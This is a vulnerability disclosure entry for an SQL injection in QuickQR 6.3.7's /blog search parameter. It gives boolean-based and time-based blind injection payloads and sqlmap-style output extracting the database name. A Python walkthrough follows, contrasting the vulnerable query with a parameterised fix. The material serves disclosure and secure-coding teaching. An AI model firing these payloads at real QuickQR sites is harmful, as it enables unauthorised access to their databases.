| Title | QuickQR 6.3.7 - SQL Injection |
|---|
| Description | # Exploit Title: QuickQR 6.3.7 - SQL Injection
# Date: 07/07/2023
# Exploit Author: skalvin aka (CraCkEr)
# Vendor: bylancer
# Vendor Homepage: https://bylancer.com/
# Software Link: https://quickqr.by-code.com/
# Version: 6.3.7
# Tested on: Windows 10 Pro
# Impact: Database Access
Release Notes:
SQL injection can allow unauthorized access to sensitive data, modification of
data, and crashing the application or making it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /blog
https://website/blog?s=[SQLI]
GET parameter 's' is vulnerable to SQL Injection
---
Parameter: s (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: s=123') OR 05923=5923 OR ('04586'='4586
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z
---
[+] Starting the Attack
fetching current database
current database: 'quickqrmenu_**'
[-] Done |
|---|
| User | skalvin (UID 49463) |
|---|
| Submission | 07.07.2023 20:35 |
|---|
| Moderation | 15.07.2023 18:26 (8 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 234235 [Bylancer QuickQR 6.3.7 GET Parameter /blog s SQL Injection] |
|---|
| Points | 17 |
|---|
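The boolean-based blind finding above, as an added example that is not part of the submission and not QuickQR's own code: a minimal search endpoint rebuilt in Python over an in-memory SQLite database, with the `s` parameter spliced into the SQL (the assumed vulnerable shape) beside a version that binds it as a parameter. The table name `posts`, the column `title`, the parenthesised `LIKE` clause and the sample rows are all assumptions, chosen so that the advisory's payload, which closes exactly one quote and one parenthesis before its `OR`, lines up with the query. The second, MySQL-specific `SLEEP` payload is not exercised here because SQLite has no `SLEEP()`.

```python
import sqlite3

# Constructed sample rows; they are not data from any QuickQR installation.
POSTS = [
    (1, "Launch of QR menus"),
    (2, "Printing tips"),
    (3, "Dynamic codes explained"),
]

# The two probes behind the advisory's boolean-based finding. They differ only
# in the integer comparison: 05923=5923 is true, 05923=5924 is false.
TRUE_PAYLOAD = "123') OR 05923=5923 OR ('04586'='4586"
FALSE_PAYLOAD = "123') OR 05923=5924 OR ('04586'='4586"


def make_db():
    """Create an in-memory database standing in for the blog's posts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)", POSTS)
    return conn


def search_vulnerable(conn, s):
    """Hypothetical reconstruction of /blog?s=: the GET parameter is spliced
    into the SQL text. With TRUE_PAYLOAD the statement becomes
      WHERE (title LIKE '%123') OR 05923=5923 OR ('04586'='4586%')
    which is true for every row, so every post comes back."""
    sql = f"SELECT id FROM posts WHERE (title LIKE '%{s}%') ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, s):
    """Hardened form: the value is bound as a parameter, so the quote and
    parenthesis in the payload are matched as data, never parsed as SQL."""
    sql = "SELECT id FROM posts WHERE (title LIKE ?) ORDER BY id"
    return [row[0] for row in conn.execute(sql, (f"%{s}%",))]


def leaks_boolean_oracle(conn, search):
    """True if the two probes yield different result sets, i.e. an attacker
    can ask the database yes/no questions through the search box (which is
    what sqlmap then drives condition by condition to dump the schema)."""
    return search(conn, TRUE_PAYLOAD) != search(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("vulnerable", search_vulnerable), ("safe", search_safe)):
        print(f"{name}: true probe -> {fn(conn, TRUE_PAYLOAD)}, "
              f"false probe -> {fn(conn, FALSE_PAYLOAD)}, "
              f"oracle: {leaks_boolean_oracle(conn, fn)}")
```

The vulnerable search returns all three rows for the true probe and none for the false one; that difference is the oracle, and the presence of a second, sleep-based payload in the advisory shows the same oracle can be read through response time when the page does not change. The bound-parameter version returns the same empty set for both probes, because the whole string is compared as a `LIKE` pattern rather than parsed as SQL.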